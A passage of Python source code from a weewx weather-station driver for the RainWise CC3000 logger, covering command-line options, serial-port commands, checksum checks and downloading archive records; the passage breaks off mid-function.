def do_options(self, options, parser, config_dict, prompt): # @UnusedVariable
self.driver = CC3000Driver(**config_dict[DRIVER_NAME])
if options.current:
print(self.driver.get_current())
elif options.nrecords is not None:
for r in self.driver.station.gen_records(options.nrecords):
print(r)
elif options.nminutes is not None:
since_ts = time.mktime((datetime.datetime.now()-datetime.timedelta(
minutes=options.nminutes)).timetuple())
for r in self.driver.gen_records_since_ts(since_ts):
print(r)
elif options.clear:
self.clear_memory(options.noprompt)
elif options.gethead:
print(self.driver.station.get_header())
elif options.getrain:
print(self.driver.station.get_rain())
elif options.resetrain:
self.reset_rain(options.noprompt)
elif options.getmax:
print(self.driver.station.get_max())
elif options.resetmax:
self.reset_max(options.noprompt)
elif options.getmin:
print(self.driver.station.get_min())
elif options.resetmin:
self.reset_min(options.noprompt)
elif options.getclock:
print(self.driver.station.get_time())
elif options.setclock:
self.set_clock(options.noprompt)
elif options.getdst:
print(self.driver.station.get_dst())
elif options.setdst:
self.set_dst(options.setdst, options.noprompt)
elif options.getint:
print(self.driver.station.get_interval() * 60)
elif options.interval is not None:
self.set_interval(options.interval / 60, options.noprompt)
elif options.getunits:
print(self.driver.station.get_units())
elif options.units is not None:
self.set_units(options.units, options.noprompt)
elif options.getch:
print(self.driver.station.get_channel())
elif options.ch is not None:
self.set_channel(options.ch, options.noprompt)
else:
print("Firmware:", self.driver.station.get_version())
print("Time:", self.driver.station.get_time())
print("DST:", self.driver.station.get_dst())
print("Units:", self.driver.station.get_units())
print("Memory:", self.driver.station.get_memory_status())
print("Interval:", self.driver.station.get_interval() * 60)
print("Channel:", self.driver.station.get_channel())
print("Charger:", self.driver.station.get_charger())
print("Baro:", self.driver.station.get_baro())
print("Rain:", self.driver.station.get_rain())
print("HEADER:", self.driver.station.get_header())
print("MAX:", self.driver.station.get_max())
print("MIN:", self.driver.station.get_min())
self.driver.closePort()
def clear_memory(self, noprompt):
print(self.driver.station.get_memory_status())
ans = weeutil.weeutil.y_or_n("Clear console memory (y/n)? ",
noprompt)
if ans == 'y':
print('Clearing memory (takes approx. 12s)')
self.driver.station.clear_memory()
print(self.driver.station.get_memory_status())
else:
print("Clear memory cancelled.")
def reset_rain(self, noprompt):
print(self.driver.station.get_rain())
ans = weeutil.weeutil.y_or_n("Reset rain counter (y/n)? ",
noprompt)
if ans == 'y':
print('Resetting rain counter')
self.driver.station.reset_rain()
print(self.driver.station.get_rain())
else:
print("Reset rain cancelled.")
def reset_max(self, noprompt):
print(self.driver.station.get_max())
ans = weeutil.weeutil.y_or_n("Reset max counters (y/n)? ",
noprompt)
if ans == 'y':
print('Resetting max counters')
self.driver.station.reset_max()
print(self.driver.station.get_max())
else:
print("Reset max cancelled.")
def reset_min(self, noprompt):
print(self.driver.station.get_min())
ans = weeutil.weeutil.y_or_n("Reset min counters (y/n)? ",
noprompt)
if ans == 'y':
print('Resetting min counters')
self.driver.station.reset_min()
print(self.driver.station.get_min())
else:
print("Reset min cancelled.")
def set_interval(self, interval, noprompt):
if interval < 0 or 60 < interval:
raise ValueError("Logger interval must be 0-60 minutes")
print("Interval is", self.driver.station.get_interval(), " minutes.")
ans = weeutil.weeutil.y_or_n("Set interval to %d minutes (y/n)? " % interval,
noprompt)
if ans == 'y':
print("Setting interval to %d minutes" % interval)
self.driver.station.set_interval(interval)
print("Interval is now", self.driver.station.get_interval())
else:
print("Set interval cancelled.")
def set_clock(self, noprompt):
print("Station clock is", self.driver.station.get_time())
print("Current time is", datetime.datetime.now())
ans = weeutil.weeutil.y_or_n("Set station time to current time (y/n)? ",
noprompt)
if ans == 'y':
print("Setting station clock to %s" % datetime.datetime.now())
self.driver.station.set_time()
print("Station clock is now", self.driver.station.get_time())
else:
print("Set clock cancelled.")
def set_units(self, units, noprompt):
if units.lower() not in ['metric', 'english']:
raise ValueError("Units must be METRIC or ENGLISH")
print("Station units is", self.driver.station.get_units())
ans = weeutil.weeutil.y_or_n("Set station units to %s (y/n)? " % units,
noprompt)
if ans == 'y':
print("Setting station units to %s" % units)
self.driver.station.set_units(units)
print("Station units is now", self.driver.station.get_units())
else:
print("Set units cancelled.")
def set_dst(self, dst, noprompt):
if dst != '0' and len(dst.split(',')) != 3:
raise ValueError("DST must be 0 (disabled) or start, stop, amount "
"with the format mm/dd HH:MM, mm/dd HH:MM, [MM]M")
print("Station DST is", self.driver.station.get_dst())
ans = weeutil.weeutil.y_or_n("Set station DST to %s (y/n)? " % dst,
noprompt)
if ans == 'y':
print("Setting station DST to %s" % dst)
self.driver.station.set_dst(dst)
print("Station DST is now", self.driver.station.get_dst())
else:
print("Set DST cancelled.")
def set_channel(self, ch, noprompt):
if ch not in [0, 1, 2, 3]:
raise ValueError("Channel must be one of 0, 1, 2, or 3")
print("Station channel is", self.driver.station.get_channel())
ans = weeutil.weeutil.y_or_n("Set station channel to %s (y/n)? " % ch,
noprompt)
if ans == 'y':
print("Setting station channel to %s" % ch)
self.driver.station.set_channel(ch)
print("Station channel is now", self.driver.station.get_channel())
else:
print("Set channel cancelled.")
class CC3000Driver(weewx.drivers.AbstractDevice):
"""weewx driver that communicates with a RainWise CC3000 data logger."""
# map rainwise names to database schema names
DEFAULT_SENSOR_MAP = {
'dateTime': 'TIMESTAMP',
'outTemp': 'TEMP OUT',
'outHumidity': 'HUMIDITY',
'windDir': 'WIND DIRECTION',
'windSpeed': 'WIND SPEED',
'windGust': 'WIND GUST',
'pressure': 'PRESSURE',
'inTemp': 'TEMP IN',
'extraTemp1': 'TEMP 1',
'extraTemp2': 'TEMP 2',
'day_rain_total': 'RAIN',
'supplyVoltage': 'STATION BATTERY',
'consBatteryVoltage': 'BATTERY BACKUP',
'radiation': 'SOLAR RADIATION',
'UV': 'UV INDEX',
}
def __init__(self, **stn_dict):
log.info('Driver version is %s' % DRIVER_VERSION)
global DEBUG_SERIAL
DEBUG_SERIAL = int(stn_dict.get('debug_serial', 0))
global DEBUG_CHECKSUM
DEBUG_CHECKSUM = int(stn_dict.get('debug_checksum', 0))
global DEBUG_OPENCLOSE
DEBUG_OPENCLOSE = int(stn_dict.get('debug_openclose', 0))
self.max_tries = int(stn_dict.get('max_tries', 5))
self.model = stn_dict.get('model', 'CC3000')
port = stn_dict.get('port', CC3000.DEFAULT_PORT)
log.info('Using serial port %s' % port)
self.polling_interval = float(stn_dict.get('polling_interval', 2))
log.info('Polling interval is %s seconds' % self.polling_interval)
self.use_station_time = weeutil.weeutil.to_bool(
stn_dict.get('use_station_time', True))
log.info('Using %s time for loop packets' %
('station' if self.use_station_time else 'computer'))
# start with the default sensormap, then augment with user-specified
self.sensor_map = dict(self.DEFAULT_SENSOR_MAP)
if 'sensor_map' in stn_dict:
self.sensor_map.update(stn_dict['sensor_map'])
log.info('Sensor map is %s' % self.sensor_map)
# periodically check the logger memory, then clear it if necessary.
# these track the last time a check was made, and how often to make
# the checks. threshold of None indicates do not clear logger.
self.logger_threshold = to_int(
stn_dict.get('logger_threshold', 0))
self.last_mem_check = 0
self.mem_interval = 7 * 24 * 3600
if self.logger_threshold != 0:
log.info('Clear logger at %s records' % self.logger_threshold)
# track the last rain counter value so we can determine deltas
self.last_rain = None
self.station = CC3000(port)
self.station.open()
# report the station configuration
settings = self._init_station_with_retries(self.station, self.max_tries)
log.info('Firmware: %s' % settings['firmware'])
self.arcint = settings['arcint']
log.info('Archive interval: %s' % self.arcint)
self.header = settings['header']
log.info('Header: %s' % self.header)
self.units = weewx.METRICWX if settings['units'] == 'METRIC' else weewx.US
log.info('Units: %s' % settings['units'])
log.info('Channel: %s' % settings['channel'])
log.info('Charger status: %s' % settings['charger'])
log.info('Memory: %s' % self.station.get_memory_status())
def time_to_next_poll(self):
now = time.time()
next_poll_event = int(now / self.polling_interval) * self.polling_interval + self.polling_interval
log.debug('now: %f, polling_interval: %d, next_poll_event: %f' % (now, self.polling_interval, next_poll_event))
secs_to_poll = next_poll_event - now
log.debug('Next polling event in %f seconds' % secs_to_poll)
return secs_to_poll
def genLoopPackets(self):
cmd_mode = True
if self.polling_interval == 0:
self.station.set_auto()
cmd_mode = False
reboot_attempted = False
ntries = 0
while ntries < self.max_tries:
ntries += 1
try:
# Poll on polling_interval boundaries.
if self.polling_interval != 0:
time.sleep(self.time_to_next_poll())
values = self.station.get_current_data(cmd_mode)
now = int(time.time())
ntries = 0
log.debug("Values: %s" % values)
if values:
packet = self._parse_current(
values, self.header, self.sensor_map)
log.debug("Parsed: %s" % packet)
if packet and 'dateTime' in packet:
if not self.use_station_time:
packet['dateTime'] = int(time.time() + 0.5)
packet['usUnits'] = self.units
if 'day_rain_total' in packet:
packet['rain'] = self._rain_total_to_delta(
packet['day_rain_total'], self.last_rain)
self.last_rain = packet['day_rain_total']
else:
log.debug("No rain in packet: %s" % packet)
log.debug("Packet: %s" % packet)
yield packet
else:
if not reboot_attempted:
# To be on the safe side, max of one reboot per execution.
reboot_attempted = True
log.info("No data from sensors, rebooting.")
startup_msgs = self.station.reboot()
log.info("Back from a reboot:")
for line in startup_msgs:
log.info(line)
# periodically check memory, clear if necessary
if time.time() - self.last_mem_check > self.mem_interval:
nrec = self.station.get_history_usage()
self.last_mem_check = time.time()
if nrec is None:
log.info("Memory check: Cannot determine memory usage")
else:
log.info("Logger is at %d records, "
"logger clearing threshold is %d" %
(nrec, self.logger_threshold))
if self.logger_threshold != 0 and nrec >= self.logger_threshold:
log.info("Clearing all records from logger")
self.station.clear_memory()
except (serial.serialutil.SerialException, weewx.WeeWxIOError) as e:
log.error("Failed attempt %d of %d to get data: %s" %
(ntries, self.max_tries, e))
else:
msg = "Max retries (%d) exceeded" % self.max_tries
log.error(msg)
raise weewx.RetriesExceeded(msg)
def genStartupRecords(self, since_ts):
"""Return archive records from the data logger. Download all records
then return the subset since the indicated timestamp.
Assumptions:
- the units are consistent for the entire history.
- the archive interval is constant for entire history.
- the HDR for archive records is the same as current HDR
"""
log.debug("GenStartupRecords: since_ts=%s" % since_ts)
log.info('Downloading new records (if any).')
last_rain = None
new_records = 0
for pkt in self.gen_records_since_ts(since_ts):
log.debug("Packet: %s" % pkt)
pkt['usUnits'] = self.units
pkt['interval'] = self.arcint
if 'day_rain_total' in pkt:
pkt['rain'] = self._rain_total_to_delta(
pkt['day_rain_total'], last_rain)
last_rain = pkt['day_rain_total']
else:
log.debug("No rain in record: %s" % r)
log.debug("Packet: %s" % pkt)
new_records += 1
yield pkt
log.info('Downloaded %d new records.' % new_records)
def gen_records_since_ts(self, since_ts):
return self.station.gen_records_since_ts(self.header, self.sensor_map, since_ts)
@property
def hardware_name(self):
return self.model
@property
def archive_interval(self):
return self.arcint
def getTime(self):
try:
v = self.station.get_time()
return _to_ts(v)
except ValueError as e:
log.error("getTime failed: %s" % e)
return 0
def setTime(self):
self.station.set_time()
@staticmethod
def _init_station_with_retries(station, max_tries):
for cnt in range(max_tries):
try:
return CC3000Driver._init_station(station)
except (serial.serialutil.SerialException, weewx.WeeWxIOError) as e:
log.error("Failed attempt %d of %d to initialize station: %s" %
(cnt + 1, max_tries, e))
else:
raise weewx.RetriesExceeded("Max retries (%d) exceeded while initializing station" % max_tries)
@staticmethod
def _init_station(station):
station.flush()
station.wakeup()
station.set_echo()
settings = dict()
settings['firmware'] = station.get_version()
settings['arcint'] = station.get_interval() * 60 # arcint is in seconds
settings['header'] = CC3000Driver._parse_header(station.get_header())
settings['units'] = station.get_units()
settings['channel'] = station.get_channel()
settings['charger'] = station.get_charger()
return settings
@staticmethod
def _rain_total_to_delta(rain_total, last_rain):
# calculate the rain delta between the current and previous rain totals.
return weewx.wxformulas.calculate_rain(rain_total, last_rain)
@staticmethod
def _parse_current(values, header, sensor_map):
return CC3000Driver._parse_values(values, header, sensor_map,
"%Y/%m/%d %H:%M:%S")
@staticmethod
def _parse_values(values, header, sensor_map, fmt):
"""parse the values and map them into the schema names. if there is
a failure for any one value, then the entire record fails."""
pkt = dict()
if len(values) != len(header) + 1:
log.info("Values/header mismatch: %s %s" % (values, header))
return pkt
for i, v in enumerate(values):
if i >= len(header):
continue
label = None
for m in sensor_map:
if sensor_map[m] == header[i]:
label = m
if label is None:
continue
try:
if header[i] == 'TIMESTAMP':
pkt[label] = _to_ts(v, fmt)
else:
pkt[label] = float(v)
except ValueError as e:
log.error("Parse failed for '%s' '%s': %s (idx=%s values=%s)" %
(header[i], v, e, i, values))
return dict()
return pkt
@staticmethod
def _parse_header(header):
h = []
for v in header:
if v == 'HDR' or v[0:1] == '!':
continue
h.append(v.replace('"', ''))
return h
def get_current(self):
data = self.station.get_current_data()
return self._parse_current(data, self.header, self.sensor_map)
def _to_ts(tstr, fmt="%Y/%m/%d %H:%M:%S"):
return time.mktime(time.strptime(tstr, fmt))
def _format_bytes(buf):
# byte2int not necessary in PY3 and will raise an exception
# if used ("int object is not subscriptable")
if PY2:
return ' '.join(['%0.2X' % byte2int(c) for c in buf])
return ' '.join(['%0.2X' % c for c in buf])
def _check_crc(buf):
idx = buf.find(b'!')
if idx < 0:
return
a = 0
b = 0
cs = b''
try:
cs = buf[idx+1:idx+5]
if DEBUG_CHECKSUM:
log.debug("Found checksum at %d: %s" % (idx, cs))
a = crc16(buf[0:idx]) # calculate checksum
if DEBUG_CHECKSUM:
log.debug("Calculated checksum %x" % a)
b = int(cs, 16) # checksum provided in data
if a != b:
raise ChecksumMismatch(a, b, buf)
except ValueError as e:
raise BadCRC(a, cs, buf)
class CC3000(object):
DEFAULT_PORT = '/dev/ttyUSB0'
def __init__(self, port):
self.port = port
self.baudrate = 115200
self.timeout = 1 # seconds for everyting except MEM=CLEAR
# MEM=CLEAR of even two records needs a timeout of 13 or more. 20 is probably safe.
# flush cmd echo value
# 0.000022 0.000037 12.819934 0.000084
# 0.000018 0.000036 12.852024 0.000088
self.mem_clear_timeout = 20 # reopen w/ bigger timeout for MEM=CLEAR
self.serial_port = None
def __enter__(self):
self.open()
return self
def __exit__(self, _, value, traceback):
self.close()
def open(self, timeoutOverride=None):
if DEBUG_OPENCLOSE:
log.debug("Open serial port %s" % self.port)
to = timeoutOverride if timeoutOverride is not None else self.timeout
self.serial_port = serial.Serial(self.port, self.baudrate,
timeout=to)
def close(self):
if self.serial_port is not None:
if DEBUG_OPENCLOSE:
log.debug("Close serial port %s" % self.port)
self.serial_port.close()
self.serial_port = None
def write(self, data):
if not PY2:
# Encode could perhaps fail on bad user input (DST?).
# If so, this will be handled later when it is observed that the
# command does not do what is expected.
data = data.encode('ascii', 'ignore')
if DEBUG_SERIAL:
log.debug("Write: '%s'" % data)
n = self.serial_port.write(data)
if n is not None and n != len(data):
raise weewx.WeeWxIOError("Write expected %d chars, sent %d" %
(len(data), n))
def read(self):
"""The station sends CR NL before and after any response. Some
responses have a 4-byte CRC checksum at the end, indicated with an
exclamation. Not every response has a checksum.
"""
data = self.serial_port.readline()
if DEBUG_SERIAL:
log.debug("Read: '%s' (%s)" % (data, _format_bytes(data)))
data = data.strip()
_check_crc(data)
if not PY2:
# CRC passed, so this is unlikely.
# Ignore as irregular data will be handled later.
data = data.decode('ascii', 'ignore')
return data
def flush(self):
self.flush_input()
self.flush_output()
def flush_input(self):
log.debug("Flush input buffer")
self.serial_port.flushInput()
def flush_output(self):
log.debug("Flush output buffer")
self.serial_port.flushOutput()
def queued_bytes(self):
return self.serial_port.inWaiting()
def send_cmd(self, cmd):
"""Any command must be terminated with a CR"""
self.write("%s\r" % cmd)
def command(self, cmd):
# Sample timings for first fifteen NOW commands after startup.
# Flush CMD ECHO VALUE
# -------- -------- -------- --------
# 0.000021 0.000054 0.041557 0.001364
# 0.000063 0.000109 0.040432 0.001666
# 0.000120 0.000123 0.024272 0.016871
# 0.000120 0.000127 0.025148 0.016657
# 0.000119 0.000126 0.024966 0.016665
# 0.000130 0.000142 0.041037 0.001791
# 0.000120 0.000126 0.023533 0.017023
# 0.000120 0.000137 0.024336 0.016747
# 0.000117 0.000133 0.026254 0.016684
# 0.000120 0.000140 0.025014 0.016739
# 0.000121 0.000134 0.024801 0.016779
# 0.000120 0.000141 0.024635 0.016906
# 0.000118 0.000129 0.024354 0.016894
# 0.000120 0.000133 0.024214 0.016861
# 0.000118 0.000122 0.024599 0.016865
# MEM=CLEAR needs a longer timeout. >12s to clear a small number of records has been observed.
# It also appears to be highly variable. The two examples below are from two different CC3000s.
#
# In this example, clearing at 11,595 records took > 6s.
# Aug 18 06:46:21 charlemagne weewx[684]: cc3000: logger is at 11595 records, logger clearing threshold is 10000
# Aug 18 06:46:21 charlemagne weewx[684]: cc3000: clearing all records from logger
# Aug 18 06:46:21 charlemagne weewx[684]: cc3000: MEM=CLEAR: The resetting of timeout to 20 took 0.000779 seconds.
# Aug 18 06:46:28 charlemagne weewx[684]: cc3000: MEM=CLEAR: times: 0.000016 0.000118 6.281638 0.000076
# Aug 18 06:46:28 charlemagne weewx[684]: cc3000: MEM=CLEAR: The resetting of timeout to 1 took 0.001444 seconds.
#
# In this example, clearing at 11,475 records took > 12s.
# Aug 18 07:17:14 ella weewx[615]: cc3000: logger is at 11475 records, logger clearing threshold is 10000
# Aug 18 07:17:14 ella weewx[615]: cc3000: clearing all records from logger
# Aug 18 07:17:14 ella weewx[615]: cc3000: MEM=CLEAR: The resetting of timeout to 20 took 0.001586 seconds.
# Aug 18 07:17:27 ella weewx[615]: cc3000: MEM=CLEAR: times: 0.000020 0.000058 12.459346 0.000092
# Aug 18 07:17:27 ella weewx[615]: cc3000: MEM=CLEAR: The resetting of timeout to 1 took 0.001755 seconds.
#
# Here, clearing 90 records took very close to 13 seconds.
# Aug 18 14:46:00 ella weewx[24602]: cc3000: logger is at 91 records, logger clearing threshold is 90
# Aug 18 14:46:00 ella weewx[24602]: cc3000: clearing all records from logger
# Aug 18 14:46:00 ella weewx[24602]: cc3000: MEM=CLEAR: The resetting of timeout to 20 took 0.000821 seconds.
# Aug 18 14:46:13 ella weewx[24602]: cc3000: MEM=CLEAR: times: 0.000037 0.000061 12.970494 0.000084
# Aug 18 14:46:13 ella weewx[24602]: cc3000: MEM=CLEAR: The resetting of timeout to 1 took 0.001416 seconds.
reset_timeout = False
# MEM=CLEAR needs a much larger timeout value. Reopen with that larger timeout and reset below.
#
# Closing and reopening with a different timeout is quick:
# Aug 18 07:17:14 ella weewx[615]: cc3000: MEM=CLEAR: The resetting of timeout to 20 took 0.001586 seconds.
# Aug 18 07:17:27 ella weewx[615]: cc3000: MEM=CLEAR: The resetting of timeout to 1 took 0.001755 seconds.
if cmd == 'MEM=CLEAR':
reset_timeout = True # Reopen with default timeout in finally.
t1 = time.time()
self.close()
self.open(self.mem_clear_timeout)
t2 = time.time()
close_open_time = t2 - t1
log.info("%s: The resetting of timeout to %d took %f seconds." % (cmd, self.mem_clear_timeout, close_open_time))
try:
return self.exec_cmd_with_retries(cmd)
finally:
if reset_timeout:
t1 = time.time()
self.close()
self.open()
reset_timeout = True
t2 = time.time()
close_open_time = t2 - t1
log.info("%s: The resetting of timeout to %d took %f seconds." % (cmd, self.timeout, close_open_time))
def exec_cmd_with_retries(self, cmd):
"""Send cmd. Time the reading of the echoed command. If the measured
time is >= timeout, the cc3000 is borked. The input and output buffers
will be flushed and the command retried. Try up to 10 times.
It practice, one retry does the trick.
cc3000s.
"""
attempts = 0
while attempts < 10:
attempts += 1
t1 = time.time()
self.flush() # flush
t2 = time.time()
flush_time = t2 - t1
self.send_cmd(cmd) # send cmd
t3 = time.time()
cmd_time = t3 - t2
data = self.read() # read the cmd echo
t4 = time.time()
echo_time = t4 - t3
if ((cmd != 'MEM=CLEAR' and echo_time >= self.timeout)
or (cmd == 'MEM=CLEAR' and echo_time >= self.mem_clear_timeout)):
# The command timed out reading back the echo of the command.
# No need to read the values as it will also time out.
# Log it and retry. In practice, the retry always works.
log.info("%s: times: %f %f %f -retrying-" %
(cmd, flush_time, cmd_time, echo_time))
log.info('%s: Reading cmd echo timed out (%f seconds), retrying.' %
(cmd, echo_time))
# Retrying setting the time must be special cased as now a little
# more than one second has passed. As such, redo the command
# with the current time.
if cmd.startswith("TIME=") and cmd != "TIME=?":
cmd = self._compose_set_time_command()
# Retry
else:
# Success, the reading of the echoed command did not time out.
break
if data != cmd and attempts > 1:
# After retrying, the cmd always echoes back as an empty string.
if data == '':
log.info("%s: Accepting empty string as cmd echo." % cmd)
else:
raise weewx.WeeWxIOError(
"command: Command failed: cmd='%s' reply='%s'" % (cmd, data))
t5 = time.time()
retval = self.read()
t6 = time.time()
value_time = t6 - t5
if cmd == 'MEM=CLEAR':
log.info("%s: times: %f %f %f %f" %
(cmd, flush_time, cmd_time, echo_time, value_time))
if attempts > 1:
if retval != '':
log.info("%s: Retry worked. Total tries: %d" % (cmd, attempts))
else:
log.info("%s: Retry failed." % cmd)
log.info("%s: times: %f %f %f %f" %
(cmd, flush_time, cmd_time, echo_time, value_time))
return retval
def get_version(self):
log.debug("Get firmware version")
return self.command("VERSION")
def reboot(self):
# Reboot outputs the following (after the reboot):
# ....................
# <blank line>
# Rainwise CC-3000 Version: 1.3 Build 022 Dec 02 2016
# Flash ID 202015
# Initializing memory...OK.
log.debug("Rebooting CC3000.")
self.send_cmd("REBOOT")
time.sleep(5)
dots = self.read()
blank = self.read()
ver = self.read()
flash_id = self.read()
init_msg = self.read()
return [dots, blank, ver, flash_id, init_msg]
# give the station some time to wake up. when we first hit it with a
# command, it often responds with an empty string. then subsequent
# commands get the proper response. so for a first command, send something
# innocuous and wait a bit. hopefully subsequent commands will then work.
# NOTE: This happens periodically and does not appear to be related to
# "waking up". Getter commands now retry, so removing the sleep.
def wakeup(self):
self.command('ECHO=?')
def set_echo(self, cmd='ON'):
log.debug("Set echo to %s" % cmd)
data = self.command('ECHO=%s' % cmd)
if data != 'OK':
raise weewx.WeeWxIOError("Set ECHO failed: %s" % data)
def get_header(self):
log.debug("Get header")
data = self.command("HEADER")
cols = data.split(',')
if cols[0] != 'HDR':
raise weewx.WeeWxIOError("Expected HDR, got %s" % cols[0])
return cols
def set_auto(self):
# auto does not echo the command
self.send_cmd("AUTO")
def get_current_data(self, send_now=True):
data = ''
if send_now:
data = self.command("NOW")
else:
data = self.read()
if data == 'NO DATA' or data == 'NO DATA RECEIVED':
log.debug("No data from sensors")
return []
return data.split(',')
def get_time(self):
# unlike all of the other accessor methods, the TIME command returns
# OK after it returns the requested parameter. so we have to pop the
# OK off the serial so it does not trip up other commands.
log.debug("Get time")
tstr = self.command("TIME=?")
if tstr not in ['ERROR', 'OK']:
data = self.read()
if data != 'OK':
raise weewx.WeeWxIOError("Failed to get time: %s, %s" % (tstr, data))
return tstr
@staticmethod
def _compose_set_time_command():
ts = time.time()
tstr = time.strftime("%Y/%m/%d %H:%M:%S", time.localtime(ts))
log.info("Set time to %s (%s)" % (tstr, ts))
return "TIME=%s" % tstr
def set_time(self):
s = self._compose_set_time_command()
data = self.command(s)
if data != 'OK':
raise weewx.WeeWxIOError("Failed to set time to %s: %s" %
(s, data))
def get_dst(self):
log.debug("Get daylight saving")
return self.command("DST=?")
def set_dst(self, dst):
log.debug("Set DST to %s" % dst)
# Firmware 1.3 Build 022 Dec 02 2016 returns 3 lines (<input-dst>,'',OK)
data = self.command("DST=%s" % dst) # echoed input dst
if data != dst:
raise weewx.WeeWxIOError("Failed to set DST to %s: %s" %
(dst, data))
data = self.read() # read ''
if data not in ['ERROR', 'OK']:
data = self.read() # read OK
if data != 'OK':
raise weewx.WeeWxIOError("Failed to set DST to %s: %s" %
(dst, data))
def get_units(self):
log.debug("Get units")
return self.command("UNITS=?")
def set_units(self, units):
log.debug("Set units to %s" % units)
data = self.command("UNITS=%s" % units)
if data != 'OK':
raise weewx.WeeWxIOError("Failed to set units to %s: %s" %
(units, data))
def get_interval(self):
log.debug("Get logging interval")
return int(self.command("LOGINT=?"))
def set_interval(self, interval=5):
log.debug("Set logging interval to %d minutes" % interval)
data = self.command("LOGINT=%d" % interval)
if data != 'OK':
raise weewx.WeeWxIOError("Failed to set logging interval: %s" %
data)
def get_channel(self):
log.debug("Get channel")
return self.command("STATION")
def set_channel(self, channel):
log.debug("Set channel to %d" % channel)
if channel < 0 or 3 < channel:
raise ValueError("Channel must be 0-3")
data = self.command("STATION=%d" % channel)
if data != 'OK':
raise weewx.WeeWxIOError("Failed to set channel: %s" % data)
def get_charger(self):
log.debug("Get charger")
return self.command("CHARGER")
def get_baro(self):
log.debug("Get baro")
return self.command("BARO")
def set_baro(self, offset):
log.debug("Set barometer offset to %d" % offset)
if offset != '0':
parts = offset.split('.')
if (len(parts) != 2 or
(not (len(parts[0]) == 2 and len(parts[1]) == 2) and
not (len(parts[0]) == 3 and len(parts[1]) == 1))):
raise ValueError("Offset must be 0, XX.XX (inHg), or XXXX.X (mbar)")
data = self.command("BARO=%d" % offset)
if data != 'OK':
raise weewx.WeeWxIOError("Failed to set baro: %s" % data)
def get_memory_status(self):
# query for logger memory use. output is something like this:
# 6438 bytes, 111 records, 0%
log.debug("Get memory status")
return self.command("MEM=?")
def get_max(self):
log.debug("Get max values")
# Return outside temperature, humidity, pressure, wind direction,
# wind speed, rainfall (daily total), station voltage, inside
# temperature.
return self.command("MAX=?").split(',')
def reset_max(self):
log.debug("Reset max values")
data = self.command("MAX=RESET")
if data != 'OK':
raise weewx.WeeWxIOError("Failed to reset max values: %s" % data)
def get_min(self):
log.debug("Get min values")
# Return outside temperature, humidity, pressure, wind direction,
# wind speed, rainfall (ignore), station voltage, inside temperature.
return self.command("MIN=?").split(',')
def reset_min(self):
log.debug("Reset min values")
data = self.command("MIN=RESET")
if data != 'OK':
raise weewx.WeeWxIOError("Failed to reset min values: %s" % data)
def get_history_usage(self):
# return the number of records in the logger
s = self.get_memory_status()
if 'records' in s:
return int(s.split(',')[1].split()[0])
return None
def clear_memory(self):
log.debug("Clear memory")
data = self.command("MEM=CLEAR")
# It's a long wait for the OK. With a greatly increased timeout
# just for MEM=CLEAR, we should be able to read the OK.
if data == 'OK':
log.info("MEM=CLEAR succeeded.")
else:
raise weewx.WeeWxIOError("Failed to clear memory: %s" % data)
def get_rain(self):
log.debug("Get rain total")
# Firmware 1.3 Build 022 Dec 02 2017 returns OK after the rain count
# This is like TIME=?
rstr = self.command("RAIN")
if rstr not in ['ERROR', 'OK']:
data = self.read()
if data != 'OK':
raise weewx.WeeWxIOError("Failed to get rain: %s" % data)
return rstr
def reset_rain(self):
log.debug("Reset rain counter")
data = self.command("RAIN=RESET")
if data != 'OK':
raise weewx.WeeWxIOError("Failed to reset rain: %s" % data)
def gen_records_since_ts(self, header, sensor_map, since_ts):
if since_ts is None:
since_ts = 0.0
num_records = 0
else:
now_ts = time.mktime(datetime.datetime.now().timetuple())
nseconds = now_ts - since_ts
nminutes = math.ceil(nseconds / 60.0)
num_records = math.ceil(nminutes / float(self.get_interval()))
if num_records == 0:
log.debug('gen_records_since_ts: Asking for all records.')
else:
log.debug('gen_records_since_ts: Asking for %d records.' % num_records)
for r in self.gen_records(nrec=num_records):
pkt = CC3000Driver._parse_values(r[1:], header, sensor_map, "%Y/%m/%d %H:%M")
if 'dateTime' in pkt and pkt['dateTime'] > since_ts:
yield pkt
def gen_records(self, nrec=0):
"""
Generator function for getting nrec records from the device. A value
of 0 indicates all records.
The CC3000 returns a header ('HDR,'), the archive records
we are interested in ('REC,'), daily max and min records
('MAX,', 'MIN,') as well as messages for various events such as a
reboot ('MSG,').
Things get interesting when nrec is non-zero.
DOWNLOAD=n returns the latest n records in memory. The CC3000 does
not distinguish between REC, MAX, MIN and MSG records in memory.
As such, DOWNLOAD=5 does NOT mean fetch the latest 5 REC records.
For example, if the latest 5 records include a MIN and a MAX record,
only 3 REC records will be returned (along with the MIN and MAX
records).
Given that one can't ask pecisely ask for a given number of archive
records, a heuristic is used and errs on the side of asking for
too many records.
The heurisitic for number of records to ask for is:
the sum of:
nrec
7 * the number of days convered in the request (rounded up)
Note: One can determine the number of days from the number of
records requested because the archive interval is known.
Asking for an extra seven records per day allows for the one MIN and
one MAX records generated per day, plus a buffer for up to five MSG
records each day. Unless one is rebooting the CC3000 all day, this
will be plenty. Typically, there will be zero MSG records. Clearing
memory and rebooting actions generate MSG records. Both are uncommon.
As a result, gen_records will overshoot the records asked for, but this
is not a problem in practice. Also, if a new archive record is written
while this operation is taking place, it will be returned. As such,
the number wouldn't be precise anyway. One could work around this by
accumulating records before returning, and then returning an exact
amount, but it simply isn't worth it.
Examining the records in the CC3000 (808 records at the time of the
examination) shows the following records found:
HDR: 1 (the header record, per the spec)
REC: 800 (the archive records -- ~2.8 days worth)
MSG: 1 (A clear command that executed ~2.8 days ago:
MSG 2019/12/20 15:48 CLEAR ON COMMAND!749D)
MIN: 3 (As expected for 3 days.)
MAX: 3 (As expected for 3 days.)
Interrogating the CC3000 for a large number of records fails miserably
if, while reading the responses, the responses are parsed and added
to the datbase. (Check sum mismatches, partical records, etc.). If
these last two steps are skipped, reading from the CC3000 is very
reliable. This can be observed by asing for history with wee_config.
Observed with > 11K of records.
To address the above problem, all records are read into memory. Reading
all records into memory before parsing and inserting into the database
is very reliable. For smaller amounts of recoreds, the reading into
memory could be skipped, but what would be the point?
"""
log.debug('gen_records(%d)' % nrec)
totrec = self.get_history_usage()
log.debug('gen_records: Requested %d latest of %d records.' % (nrec, totrec))
if nrec == 0:
num_to_ask = 0
else:
# Determine the number of records to ask for.
# See heuristic above.
num_mins_asked = nrec * self.get_interval()
num_days_asked = math.ceil(num_mins_asked / (24.0*60))
num_to_ask = nrec + 7 * num_days_asked
if num_to_ask == 0:
cmd = 'DOWNLOAD'
else:
cmd = 'DOWNLOAD=%d' % num_to_ask
log.debug('%s' % cmd)
# Note: It takes about 14s to read 1000 records into memory.
if num_to_ask == 0:
log.info('Reading all records into memory. This could take some time.')
elif num_to_ask < 1000:
